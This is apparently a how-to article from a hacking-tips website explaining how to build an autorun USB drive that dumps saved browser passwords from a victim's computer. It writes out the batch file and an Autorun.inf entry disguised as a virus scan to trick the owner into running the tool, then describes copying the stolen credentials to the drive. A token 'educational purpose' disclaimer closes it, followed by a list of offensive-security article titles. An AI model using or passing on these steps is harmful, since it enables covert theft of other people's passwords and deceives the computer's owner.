In this article we show you How to make an auto hacking USB drive?. There are many methods but we will discuss to make an auto run hacking USB drive.
In this tutorial as Steal Passwords I am going to show you that how to make a Portable Hacking device with a Pendrive that can hack most of the online passwords from victims computer and with the help of this program you can also help your friends and relatives to recover their forgotten passwords or you can say as Steal Passwords, Yes you heard it right after following this tutorial you can hack like a pro and the tutorial is very easy.
Anyone who has a basic computer knowledge can do this tutorial Easily. During the time of tutorial if you find any queries then please feel free to ask us by simply commenting in the comment box and we will get to you asap.
Create Hacking Pendrive That Can Steal Passwords From Victims Computer
Things You Need:
1. Pen Drive
3. Web Browser Pass View(Download)
Step 1: Download Web Browser Pass views Zip file from the above link
Step 2: Insert your Pendrive to your Computer and then Quick Format It as NTFS
Step 3: Create a New Folder in your Pendrive and name the folder as “USB” and then Extract the Web Browser Passview zip file into the USB folder.
Step 4: Open a Notepad and then copy the things written below and then Save the File As USB Driver.bat
@echo off cls start \usb\WebBrowserPassView.exe /shtml 1.html
Step 5: Open a Notepad and then copy the things written below and then Save the File As Autorun.inf
[autorun] open=usbdriver.bat Action=Perform a virus Scan
Step 6: Copy both the file Autorun.inf and USBdriver.bat into your pen drive.
Step 7: Insert it into your Victims computer and you will see that after inserting it will ask for Performing a Virus Scan and then tap yes and after tapping you will get a screen Like this, just tap ctrl+a and then Ctrl+s and save the file to your pen drive, do it fast, Now open that Notepad file that you have saved, Voila, you got the passcodes of your friend.
Note: Sometimes the Autorun File doesn’t work in that criteria, you have to open the pen drive partition and then double click on USB Driver and after that just tap ctrl+a and then Ctrl+s and save the file to your pen drive. Make sure that you are doing it fast to Steal Passwords.
Please Don’t Misuse this hack, Help your friends, relatives to recover their passcodes from this program.
Every Tutorial in Gadgetsay is for an educational purpose we are not responsible for any loss.
- Web Developer Roadmap in 2024
- Free USA Ethical Hacking Course for Beginner
- Facebook Ethical Hacking Complete Tutorials Free for Beginner: Learn Online Hacking Course 2022
- SSTI (Server Side Template Injection)|Detect|Idenfify|Exploit
- Explore Hackthebox Walkthrough
- PowerShell for Pentester: Windows Reverse Shell
- How Hackers Access Using IDOR | How To Find | Examples » TechNoCP
- TODAYZOO PHISHING KIT USED TO SWIPE MICROSOFT CREDENTIALS » TechNoCP
- Information Gathering – First Step Of Hacking » TechNoCP
- Sensitive data of 400,000 German students exposed by API flaw » TechNoCP
- Wireless Hacking Basic Knowledge » TechNoCP
- How Hackers Leak Databases » TechNoCP
- How Do Hackers Hijack Websites And Browser Using Xss » TechNoCP
- How Do Hackers Upload Shellcodes Using LFI » TechNoCP
- Windows Privilege Escalation: Insecure GUI Application
- Windows Privilege Escalation: Unquoted Service Path
- Facebook Shutdown Face Recognition And Deletes Users’ Data Due to Privacy Concerns Attribution » TechNoCP
- TheNotebook HackTheBox Walkthrough
- Windows Privilege Escalation: Weak Registry Permission
- Windows Privilege Escalation: Stored Credentials (Runas)
- Windows Privilege Escalation: Boot Logon Autostart Execution (Startup Folder)
- Windows Privilege Escalation: Logon Autostart Execution (Registry Run Keys)
- Powercat for Pentester
- Windows Privilege Escalation: HiveNightmare
- Msfvenom Cheatsheet: Windows Exploitation
- How Hackers Access Server Using Command Injection » TechNoCP
- What Is XXE Injection? |How Hackers Do It. » TechNoCP
- Ethical Hacking Hindi Course for Beginner
- Cybersecurity Frameworks That Help Reduce Cyber Risk
- Flipkart Interview Experience | On-Campus 2021